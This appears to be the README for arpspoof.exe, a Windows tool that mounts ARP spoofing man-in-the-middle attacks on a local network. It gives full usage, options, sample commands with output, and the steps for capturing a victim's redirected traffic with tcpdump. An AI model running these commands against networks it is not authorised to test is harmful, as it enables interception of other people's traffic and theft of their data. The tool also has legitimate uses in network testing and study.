arpspoof
mounts an ARP spoofing attack against a host on the local network. This results in traffic from the attacked host to the default gateway (and all non-LAN hosts) and back going through the local computer and can thus be captured with tools like Wireshark. arpspoof
will also forward this traffic, so Windows does NOT have to be configured as a router.
C:\>arpspoof.exe 192.168.1.10
Resolving victim and target...
Redirecting 192.168.1.10 (00:11:22:33:44:55) ---> 192.168.1.1 (22:33:44:55:66:77)
and in the other direction
Press Ctrl+C to stop
Then run tcpdump
(or Wireshark) on the local host with the victim's MAC as a filter:
tcpdump ether host 00:11:22:33:44:55
When done, stop arpspoof
:
^C
Unspoofing
Done
Download arpspoof.exe
from the Releases page.
C:\>arpspoof.exe --help
arpspoof.exe --list | [-i iface] [--oneway] victim-ip [target-ip]
--list
lists the available network interfacesvictim-ip
is the IP of the host against which the spoofing attack is mounted (i.e., it is the host that will send us its traffic thinking we are the target host (the default gateway).target-ip
is the host we are pretending to be (as far asvictim-ip
is concerned). If not specified, the default gateway is used as the target (and thus victim's Internet-bound traffic can be captured).- By default, traffic in both the
victim -> target
andtarget -> victim
directions are redirected to the local computer.--oneway
makes only thevictim -> target
direction to be redirected. -i iface
. An interface on which to spoof ARPs will be automatically detected based on the IP addresses and masks assigned to the local interfaces andvictim-ip
. Use this option to force a specific interface. Use--list
to see the available options. Both-i 1
and-i \Device\NPF_{A91C1830-2930-4B12-8017-6664270142F4}
formats are supported.
List available interfaces for capturing/spoofing:
C:\>arpspoof.exe --list
1. \Device\NPF_{A91C1830-2930-4B12-8017-6664270142F4} VirtualBox Host-Only Ethernet Adapter (VirtualBox Host-Only Network)
192.168.56.1/24 gw=0.0.0.0
2. \Device\NPF_{9E13DC15-DBFB-4CE2-95D5-8DD283412185} Intel(R) Dual Band Wireless-AC 8265 (Wi-Fi)
192.168.1.10/24 gw=192.168.1.1
Make host 192.168.1.5 believe our computer to be the default gateway 192.168.1.1, and thus send us its Internet-bound traffic, and make the gateway 192.168.1.1 believe our computer to be 192.168.1.5, and thus send replies to us:
C:\>arpspoof.exe 192.168.1.5
The same, but only in one direction 192.168.1.5 -> 192.168.1.1. The other direction does not pass through our computer:
C:\>arpspoof.exe --oneway 192.168.1.5
arpspoof
was developed and tested on Windows 10. It should work on Windows Vista/7/8/10. It does NOT work on Windows XP, since it uses APIs introduced in Vista.
arpspoof
uses WinPcap or Npcap to send spoofed packets and forward traffic. WinPcap/Npcap should be installed for arpspoof
to run. Npcap is the more modern one, so it is recommended to use that. Note that Wireshark installs Npcap by default, so having Wireshark installed should be enough.